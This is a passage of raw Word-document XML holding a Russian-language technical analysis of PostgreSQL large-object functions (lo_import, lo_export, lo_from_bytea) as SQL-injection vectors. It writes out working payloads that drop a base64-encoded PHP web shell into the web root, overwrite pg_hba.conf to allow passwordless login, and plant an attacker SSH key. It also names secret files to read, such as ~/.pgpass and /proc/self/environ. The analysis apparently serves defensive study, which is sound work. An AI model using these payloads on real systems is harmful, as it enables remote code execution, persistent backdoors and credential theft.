        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, lo_export(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lo_from_bytea(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')</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'/var/www/html/shell.php'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)::numeric, '' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → байты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET['c']); ?&gt;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lo_from_bytea(0, data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт новый LO с auto-assigned OID, наполняет его этими байтами, возвращает OID. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> записывает содержимое в файл. Атакующий обращается к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://victim/shell.php?c=id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и получает RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для двух других целей (см. «Что произойдёт» write-блок) — структура та же, меняется только base64-контент и путь:</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trust: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode('bG9jYWwgYWxsIGFsbCB0cnVzdApob3N0IGFsbCBhbGwgMC4wLjAuMC8wIHRydXN0Cg==', 'base64')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/etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, далее отдельный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_reload_conf()</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authorized_keys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decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBQS4uLg==', 'base64')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/var/lib/postgresql/.ssh/authorized_keys</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Две группы эффектов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Read-векторы (Payload A/B)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — идентично 3.6.3: file-read с правами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-процесса, разведка конфигов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf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компрометация секретов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ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~/.pgpass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, SSL-ключи), path discovery. Не дублирую полный разбор — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6.3 → «Что произойдёт»</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Write-вектор (Payload C) — три конкретные цели</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, у каждой своя применимость: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Web-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET['c']); ?&gt;</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/var/www/html/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Применимо когда веб-сервер (Apache/nginx + php-fpm) работает на том же хосте что и PG — типичный сценарий в legacy LAMP-стеке, monorepo-deployments, docker-compose с shared volume. Эффект — RCE как user веб-сервера (обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), что в комбинации с локальными privesc-CVE даёт root.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если веб-сервер в отдельном контейнере/хосте — PG может писать в свой uid, но не в файловую систему другого хоста.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Перезапись `pg_hba.conf`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">local all all trust\nhost all all 0.0.0.0/0 trust\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_reload_conf()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (требует superuser или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_signal_backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Эффект — персистентный backdoor: любой клиент подключается без пароля под любой ролью (включая superuser). Применимо когда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 owner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(package-based инсталляции на Debian/Ubuntu/RHEL — типично).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если конфиг managed-инструментом (Patroni, k8s-operator), который перезаписывает его обратно при следующей синхронизации.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`~/.ssh/authorized_keys`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — добавление публичного SSH-ключа атакующего в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/postgresql/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (home postgres-пользователя на Linux). Эффект — SSH-доступ к хосту как user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без участия PostgreSQL вообще. Применимо когда: (а) на хосте установлен и запущен sshd; (б) postgres-user имеет shell (не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nologin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); (в) home-директория существует и содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Дальше pivot через любой sudo / kernel CVE → root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все три цели write-вектора оставляют чистый артефакт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — см. «Легитимность».</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lo_import/lo_export/lo_get/lo_create/lo_put/lo_from_bytea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — серверные функции работы с PostgreSQL large objects (специальный тип хранения BLOB-данных через OID). Все обёрнуты вокруг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenTransientFile()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read()/write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для файловых вариантов и операций над системной таблицей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для in-DB вариантов. Никакого sandboxing.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lo_create(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт пустой LO с auto-assigned OID. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_put(oid, offset, bytea)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пишет байты в LO по offset. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_from_bytea(0, data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбинация двух: один вызов, OID + content сразу.</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lo_get(oid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает весь bytea LO. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пишет содержимое LO в файл на ФС под uid postgres.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Двухшаговая read-семантика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 OID → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — артефакт исторического дизайна API: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всегда сохраняет копию файла в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (физическая таблица), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> читает оттуда. Это значит read через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> удваивает использование диска (файл в LO + ответ клиенту) и оставляет след в каталоге.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Вложенный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get(lo_import('/etc/passwd'))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает потому, что обе функции — обычные SQL-функции, выполняются в одном expression-context. OID возвращается из inner-вызова, передаётся в outer без промежуточного состояния.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До PG 11 — все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-функции работы с ФС были superuser-only. PG 11 ввёл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">две разные predefined roles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Их выдают независимо — наличие одной не подразумевает наличие другой.</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Два независимых вектора с разными правами:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
